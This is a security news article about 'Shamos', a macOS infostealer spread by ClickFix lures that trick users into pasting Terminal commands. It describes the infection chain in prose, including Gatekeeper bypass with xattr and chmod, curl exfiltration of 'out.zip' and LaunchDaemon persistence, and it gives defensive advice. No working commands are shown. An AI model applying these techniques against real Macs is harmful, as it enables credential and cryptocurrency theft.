A new infostealer malware, dubbed ‘Shamos,’ is actively targeting Mac devices through deceptive ClickFix attacks. These attacks masquerade as legitimate troubleshooting guides and purported system fixes, deceiving users into unknowingly installing the malicious software.
Shamos, identified as a variant of the Atomic macOS Stealer (AMOS), was reportedly developed by the cybercriminal group known as “COOKIE SPIDER.” The primary function of Shamos is to pilfer sensitive data and credentials stored within various applications and services on the compromised Mac device. This includes information from web browsers, Keychain access, Apple Notes, and cryptocurrency wallets.
CrowdStrike, a cybersecurity firm, detected the Shamos malware and reported that infection attempts have been identified in over 300 environments globally under their monitoring since June 2025. This indicates a widespread and ongoing campaign targeting Mac users.
The malware is propagated through ClickFix attacks, which are delivered via malvertising or through deceptive GitHub repositories. These attacks manipulate users into executing specific shell commands within the macOS Terminal application. Victims are often presented with prompts urging them to run these commands under the guise of installing software or resolving fabricated errors. However, the execution of these commands initiates the download and installation of the Shamos malware onto the system.
Advertisements and spoofed web pages, such as mac-safer[.]com and rescue-mac[.]com, are used to lure potential victims. These pages often claim to provide assistance with common macOS problems that users are likely to search for online. The pages contain instructions that direct users to copy and paste commands into the Terminal to supposedly fix the identified issue. Unbeknownst to the user, these commands do not fix any problems but instead initiate the malware infection process.
The malicious command, when executed, proceeds to decode a Base64-encoded URL and retrieves a malicious Bash script from a remote server. This script captures the user’s password and downloads the Shamos mach-O executable. The script further prepares and executes the malware, utilizing ‘xattr’ to remove the quarantine flag and ‘chmod’ to make the binary executable, effectively bypassing Apple’s Gatekeeper security feature.
Once Shamos is executed on a device, it performs anti-VM commands to determine whether it’s running within a sandboxed environment. Following this, AppleScript commands are executed for host reconnaissance and data collection. Shamos then searches for specified types of sensitive data stored on the device, including cryptocurrency wallet files, Keychain data, Apple Notes data, and information stored within the victim’s web browsers.
After the data collection process is completed, Shamos packages the collected information into an archive file named ‘out.zip’ and transmits this archive to the attacker using the ‘curl’ command. In instances where the malware is executed with sudo (superuser) privileges, Shamos creates a Plist file named ‘com.finder.helper.plist’ and stores it in the user’s LaunchDaemons directory. This ensures persistence through automatic execution when the system starts up.
CrowdStrike’s analysis also revealed that Shamos possesses the capability to download additional payloads onto the victim’s home directory. Instances have been observed where threat actors have deployed a spoofed Ledger Live wallet application and a botnet module.
macOS users are cautioned against executing commands found online if the purpose and functionality of the commands are not fully understood. The same caution applies to GitHub repositories, as the platform is often exploited to host malicious projects designed to infect unsuspecting users. When encountering issues with macOS, it is recommended to avoid sponsored search results and instead seek assistance through official Apple Community forums, which are moderated by Apple, or by using the system’s built-in Help function (Cmd + Space → “Help”).
ClickFix attacks have become an increasingly common tactic used for malware distribution. Threat actors employ these attacks in various scenarios, including TikTok videos, disguised captchas, and as purported fixes for fake Google Meet errors. The effectiveness of this tactic has led to its adoption in ransomware attacks and by state-sponsored threat actors.
Featured image credit